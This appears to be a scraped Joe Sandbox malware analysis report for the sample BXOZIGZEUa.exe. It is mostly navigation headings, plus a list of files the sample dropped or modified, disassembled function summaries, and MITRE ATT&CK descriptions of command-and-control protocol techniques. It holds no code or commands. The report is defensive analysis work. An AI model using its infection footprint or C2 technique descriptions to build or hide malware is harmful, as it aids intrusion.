
Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BXOZIGZEUa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JdEV.exe_cd8f4618334c72b9a4dd6cfe872fc24dcdd0ad_684e5ed5_2c465ccf-9f0d-4490-93df-6e7ad4546399\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER39D4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3ADE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B2D.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k2[1].rar

C:\Users\user\AppData\Local\Temp\14EA1872.exe

C:\Users\user\AppData\Local\Temp\69197FDE.exe

C:\Users\user\AppData\Local\Temp\JdEV.exe

C:\Windows\INF\oem0.PNF

C:\Windows\INF\oem1.PNF

C:\Windows\INF\oem3.PNF

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

Windows Analysis Report
BXOZIGZEUa.exe

Function 004DE757 Relevance: 103.8, APIs: 48, Strings: 11, Instructions: 559
libraryloaderstringCOMMON

Function 004D2540 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 445
memoryCOMMON

Function 00676044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 004DB7F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
filestringCOMMON

Function 004DE141 Relevance: 64.8, APIs: 43, Instructions: 304
COMMONLIBRARYCODE

Function 00547836 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 421
windowCOMMON

Function 004DA0E9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
COMMON

Function 004E1323 Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Function 0055BD98 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 39
COMMON

Function 004D1B60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237
COMMON

Function 004DF00F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 005CF91B Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Function 004D1FF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 244
fileCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre